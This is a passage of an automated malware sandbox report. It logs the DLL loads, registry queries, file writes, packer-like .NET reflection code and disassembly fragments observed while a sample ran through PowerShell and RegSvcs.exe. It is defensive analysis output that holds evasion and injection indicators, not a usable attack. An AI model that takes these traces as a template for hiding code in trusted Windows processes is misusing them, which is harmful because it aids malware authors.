Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: netutils.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: schannel.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wininet.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: netutils.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: schannel.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wininet.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: netutils.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: schannel.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Mozilla Firefox\pingsender.exe	Section loaded: ncryptsslp.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\compatibility.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000022.00000003.3141676339.0000026F3D04B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1505236184.000001F062AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1547298139.000001F079ED0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1505236184.000001F061B47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.0000000004C8C000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 8.2.powershell.exe.5b8a088.3.raw.unpack, InspectorAggregator.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B1283F0 pushad ; iretd	0_2_00007FFB4B1283F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B129A53 push ds; ret	0_2_00007FFB4B129A54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B1F2AE9 push ebp; retf	0_2_00007FFB4B1F2BB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B1F2901 push edi; retf	0_2_00007FFB4B1F2922
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB4B1F0568 push esp; retf	0_2_00007FFB4B1F0569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042A111 push ecx; ret	3_2_0042A124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D3523 push eax; retf	8_2_048D3541
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D3AB1 push ebx; retf	8_2_048D3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_048D0A7D pushfd ; iretd	8_2_048D0A82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0E4984F3 push cs; ret	8_2_0E498500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C5367B push esp; iretd	11_2_06C53681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C53460 push es; ret	11_2_06C53470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C5418F push es; ret	11_2_06C54190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C80693 push es; ret	11_2_06C81594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C876A0 push es; ret	11_2_06C876B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C893EA push B8FFFFFFh; retf	11_2_06C893EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C813F3 push es; ret	11_2_06C81594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C8634B push es; ret	11_2_06C8634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C805EC push es; ret	11_2_06C81594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C84511 push es; ret	11_2_06C84520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06C80514 push es; ret	11_2_06C81594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D11090 push 7806C413h; ret	11_2_06D11095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D119E0 push ss; ret	11_2_06D119EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D10D07 push ss; ret	11_2_06D10D1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_06D13F2D push es; ret	11_2_06D13F30

Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)			Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Lite\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp			Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Windows\explorer.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0042923D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0042923D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
